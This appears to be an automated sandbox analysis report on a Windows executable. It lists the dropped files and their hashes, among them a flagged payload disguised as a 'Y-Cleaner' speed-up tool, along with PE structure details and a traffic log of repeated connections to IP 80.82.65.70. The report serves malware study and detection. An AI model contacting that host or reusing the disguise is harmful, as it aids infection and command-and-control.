                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                          Malicious:false
                                          Preview:0
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):97296
                                          Entropy (8bit):7.9982317718947025
                                          Encrypted:true
                                          SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                          MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                          SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                          SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                          SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:V:V
                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                          Malicious:false
                                          Preview:0
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):21
                                          Entropy (8bit):3.880179922675737
                                          Encrypted:false
                                          SSDEEP:3:gFsR0GOWW:gyRhI
                                          MD5:408E94319D97609B8E768415873D5A14
                                          SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                          SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                          SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                          Malicious:false
                                          Preview:9tKiK3bsYm4fMuK47Pk3s
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):1502720
                                          Entropy (8bit):7.646111739368707
                                          Encrypted:false
                                          SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                          MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                          SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                          SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                          SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 75%
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):242176
                                          Entropy (8bit):6.47050397947197
                                          Encrypted:false
                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):1502720
                                          Entropy (8bit):7.646111739368707
                                          Encrypted:false
                                          SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                          MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                          SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                          SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                          SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 75%
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 13 06:36:34 2024, mtime=Fri Dec 13 06:36:34 2024, atime=Fri Dec 13 06:36:34 2024, length=1502720, window=hide
                                          Category:dropped
                                          Size (bytes):2205
                                          Entropy (8bit):3.9090856141323505
                                          Encrypted:false
                                          SSDEEP:48:8Oy3R9gmR5aINvNm8Q98CZI1q86nxenx0yF:8rB9zHRN1zJC4qy
                                          MD5:158C73F2FC4A39F7B7EF3DDE38AC8736
                                          SHA1:05F172DEC9E34D9867E2F8E0279A0093C12550B0
                                          SHA-256:EC18A4B32E9D874D99D3D577DCC938D41183C45EC8196B2C4D799403DDA0A7CC
                                          SHA-512:6B79252671E0A65B39AA8622E33492640F53F80310FD25ED748A864B5384A88AED89AD754ABF6CAED5BA7756DD18C1B7AA24BF2DE5C8E8667E26C723756EAD88
                                          Malicious:false
                                          Preview:L..................F.@.. ...%...1M..%...1M..%...1M..........................>.:..DG..Yr?.D..U..k0.&...&......vk.v.....R2.1M..M6..1M......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Yj<...........................%..A.p.p.D.a.t.a...B.P.1......Yh<..Local.<......CW.^.Yj<....b.......................G.L.o.c.a.l.....N.1......Yk<..Temp..:......CW.^.Yk<....l.....................c.+.T.e.m.p.....z.1......Y.<..ES3YF5~1..b......Y.<.Y.<....s........................e.s.3.Y.f.5.Z.W.r.K.d.S.0.d.D.s.0.W.N.3.J.z.E.N.....h.2......Y.< .Y-CLEA~1.EXE..L......Y.<.Y.<...........................?..Y.-.C.l.e.a.n.e.r...e.x.e.......w...............-.......v............!......C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.<.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.s.3.Y.f.5.Z.W.r.K.d.S.0.d.D.s.0.W.N.3.J.z.E.N.\.Y.-.C.l.e.a.n.e.r...e.x.e.H.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.465248075694765
                                          Encrypted:false
                                          SSDEEP:6144:4IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbj:tXD94+WlLZMM6YFH1+j
                                          MD5:654903FE401DE7279DF3BA9984C19C0D
                                          SHA1:01A869D83896A30D0B1BA7FB7963E188A3583AEF
                                          SHA-256:E4E9C82678A96F68D384E95D6A6EAE5EB4B1BCB0CCF5BFF58E4CF3653777DC1E
                                          SHA-512:454B52728F5448CBFB838A59434184EB4544B9D4317E33DD0CAF3E51CA2D56B922AD69EB8C185C3CEA68E1FE885E9B5E7C78A58BE0EBE82FC636D31634EE9086
                                          Malicious:false
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.933074694236434
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:file.exe
                                          File size:1'979'904 bytes
                                          MD5:cfc94b958cba743ed8b273401e37c465
                                          SHA1:6abb6112d7bcee3f5ca9837ad3f0a0016267fc63
                                          SHA256:501c477f13b6aef38fa11de85507a55863f99d0cde075879c9c6eab4cf11572f
                                          SHA512:a9bbb29948a22e51a023119b62995408f841681e0dcb857afc26dd8dc4c1cc8ac2d108f2f81dd385c9b217c60d254f4eec7491b38023e8c90f37339768dedf30
                                          SSDEEP:49152:FEc6qOISMFooEBNbOMOIbg1Ue01DnVYf1BcKo:FEcaDNbjX5e0Nnc1Bf
                                          TLSH:FE953376F8ECEABCD58283FBCD6194F5422995A5823C33632294CF9EF471B12C785249
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d...................
                                          Icon Hash:c7a99a8aa651798c
                                          Entrypoint:0xc72000
                                          Entrypoint Section:.taggant
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x64DDDE0C [Thu Aug 17 08:45:00 2023 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:0
                                          File Version Major:5
                                          File Version Minor:0
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:0
                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                          Instruction
                                          jmp 00007FEEE089727Ah
                                          unpcklps xmm3, dqword ptr [esi]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add cl, ch
                                          add byte ptr [eax], ah
                                          add byte ptr [eax], al
                                          Programming Language:
                                          • [C++] VS2008 build 21022
                                          • [ASM] VS2008 build 21022
                                          • [ C ] VS2008 build 21022
                                          • [IMP] VS2005 build 50727
                                          • [RES] VS2008 build 21022
                                          • [LNK] VS2008 build 21022
                                          | Name | Virtual Address | Virtual Size | Is in Section |
                                          | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
                                          | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x42105a | 0x6e | .idata |
                                          | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40e000 | 0x12168 | .rsrc |
                                          | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
                                          | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
                                          | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
                                          | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
                                          | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
                                          | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
                                          | IMAGE_DIRECTORY_ENTRY_TLS | 0x865474 | 0x18 | dinlulrd |
                                          | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
                                          | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
                                          | IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
                                          | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
                                          | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
                                          | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
                                          | Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                                          | | 0x1000 | 0x40d000 | 0x25400 | 8863cffe894d42f5eb4b13144cf0a349 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                          | .rsrc | 0x40e000 | 0x12168 | 0x9400 | 23ea90a6525d95abd5b37ad29b0a59fc | False | 0.9628378378378378 | data | 7.893094334653105 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                          | .idata | 0x421000 | 0x1000 | 0x200 | de906030ab088402d586a76aa6666758 | False | 0.15234375 | data | 1.0884795995201089 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                          | | 0x422000 | 0x29d000 | 0x200 | 5c2fa8081470e72ab4fa233694fa56b4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                          | dinlulrd | 0x6bf000 | 0x1b2000 | 0x1b1400 | 36baa7538d13d6e21d41aaf7bfd318ee | False | 0.9848483482400462 | data | 7.940454687129734 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                          | jiwmyjir | 0x871000 | 0x1000 | 0x400 | aabcba12d60f12192dd06b9794eb3405 | False | 0.76953125 | data | 6.089900433281385 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                          | .taggant | 0x872000 | 0x3000 | 0x2200 | 6a47c443547705c94360f7d5933983b9 | False | 0.006433823529411764 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                          | Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
                                          | RT_CURSOR | 0x40e730 | 0x130 | data | | | 1.0361842105263157 |
                                          | RT_CURSOR | 0x40e860 | 0x25a8 | data | | | 1.0011410788381743 |
                                          | RT_CURSOR | 0x410e08 | 0xea8 | data | | | 1.0029317697228144 |
                                          | RT_ICON | 0x8654d4 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Syriac | Syriac | 0.3648720682302772 |
                                          | RT_ICON | 0x86637c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Syriac | Syriac | 0.5063176895306859 |
                                          | RT_ICON | 0x866c24 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Syriac | Syriac | 0.5881336405529954 |
                                          | RT_ICON | 0x8672ec | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Syriac | Syriac | 0.619942196531792 |
                                          | RT_ICON | 0x867854 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Syriac | Syriac | 0.3574108818011257 |
                                          | RT_ICON | 0x8688fc | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Syriac | Syriac | 0.3536885245901639 |
                                          | RT_ICON | 0x869284 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Syriac | Syriac | 0.40425531914893614 |
                                          | RT_ICON | 0x8696ec | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Syriac | Syriac | 0.7969083155650319 |
                                          | RT_ICON | 0x86a594 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Syriac | Syriac | 0.8032490974729242 |
                                          | RT_ICON | 0x86ae3c | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Syriac | Syriac | 0.7350230414746544 |
                                          | RT_ICON | 0x86b504 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Syriac | Syriac | 0.7774566473988439 |
                                          | RT_ICON | 0x86ba6c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Syriac | Syriac | 0.6827800829875519 |
                                          | RT_ICON | 0x86e014 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Syriac | Syriac | 0.7293621013133208 |
                                          | RT_ICON | 0x86f0bc | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Syriac | Syriac | 0.7594262295081967 |
                                          | RT_ICON | 0x86fa44 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Syriac | Syriac | 0.8111702127659575 |
                                          | RT_DIALOG | 0x41c688 | 0x84 | empty | | | 0 |
                                          | RT_STRING | 0x41c70c | 0x4be | empty | | | 0 |
                                          | RT_STRING | 0x41cbcc | 0xc4 | empty | | | 0 |
                                          | RT_STRING | 0x41cc90 | 0x732 | empty | | | 0 |
                                          | RT_STRING | 0x41d3c4 | 0x7bc | empty | | | 0 |
                                          | RT_STRING | 0x41db80 | 0x5f0 | empty | | | 0 |
                                          | RT_STRING | 0x41e170 | 0x696 | empty | | | 0 |
                                          | RT_STRING | 0x41e808 | 0x7c0 | empty | | | 0 |
                                          | RT_STRING | 0x41efc8 | 0x76a | empty | | | 0 |
                                          | RT_STRING | 0x41f734 | 0x610 | empty | | | 0 |
                                          | RT_GROUP_CURSOR | 0x41fd44 | 0x22 | empty | | | 0 |
                                          | RT_GROUP_CURSOR | 0x41fd68 | 0x14 | empty | | | 0 |
                                          | RT_GROUP_ICON | 0x86feac | 0x76 | data | Syriac | Syriac | 0.6779661016949152 |
                                          | RT_GROUP_ICON | 0x86ff22 | 0x68 | data | Syriac | Syriac | 0.7115384615384616 |
                                          | RT_VERSION | 0x86ff8a | 0x1b8 | COM executable for DOS | | | 0.5704545454545454 |
                                          | RT_MANIFEST | 0x870142 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |
                                          | DLL | Import |
                                          | kernel32.dll | lstrcpy |
                                          | Language of compilation system | Country where language is spoken | Map |
                                          | Syriac | Syriac | |
                                          | Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                          Dec 13, 2024 08:35:58.255400896 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.255489111 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.255502939 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.255939960 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.259066105 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.259129047 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.259167910 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.259274960 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.262752056 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.262815952 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.262818098 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.263331890 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.266453028 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.266496897 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.267031908 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.270071030 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.270201921 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.270214081 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.271331072 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.273782015 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.273952961 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.273996115 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.274226904 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.277455091 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.277499914 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.277540922 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.277540922 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.281160116 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.281246901 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.281279087 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.281327963 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.285005093 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.285234928 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.285284042 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.285284042 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.288369894 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.288486958 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.377732992 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.377840996 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.417710066 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.538100004 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.905780077 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.907213926 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:00.943149090 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:01.063254118 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:01.433620930 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:01.433792114 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:03.459718943 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:03.632667065 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:03.980022907 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:03.980117083 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:06.007148981 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:06.126988888 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:06.491027117 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:06.491215944 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:08.521539927 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:08.641423941 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:09.011677027 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:09.011759996 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:11.037185907 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:11.158447981 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:11.525727034 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:11.525814056 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:13.553316116 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:13.673206091 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:14.085191011 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:14.085685968 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:16.115699053 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:16.235579014 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:16.612184048 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:16.612490892 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:18.647279024 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:18.767127037 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:19.137053967 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:19.137118101 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:21.162498951 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:21.163008928 CET4974480192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:21.282726049 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:21.282871008 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:21.283190012 CET804974480.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:21.283304930 CET4974480192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:21.283587933 CET4974480192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:21.403541088 CET804974480.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:22.623142004 CET804974480.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:22.623321056 CET4974480192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:24.646616936 CET4974480192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:24.647301912 CET4975580192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:24.767656088 CET804974480.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:24.767774105 CET4974480192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:24.767844915 CET804975580.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:24.768013000 CET4975580192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:24.768309116 CET4975580192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:24.888135910 CET804975580.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:26.105125904 CET804975580.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:26.105242014 CET4975580192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:28.771296024 CET4975580192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:28.891621113 CET804975580.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:28.891953945 CET4975580192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:29.181232929 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:29.301245928 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:29.301347017 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:29.301923037 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:29.421742916 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791419983 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791452885 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791465044 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791517019 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.791546106 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.791565895 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791578054 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791589975 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791600943 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791610003 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.791630983 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.791841030 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791851997 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791863918 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791881084 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.791908979 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.911623955 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.911658049 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.911700964 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.911737919 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.983545065 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.983620882 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.983629942 CET804976680.82.65.70192.168.2.4
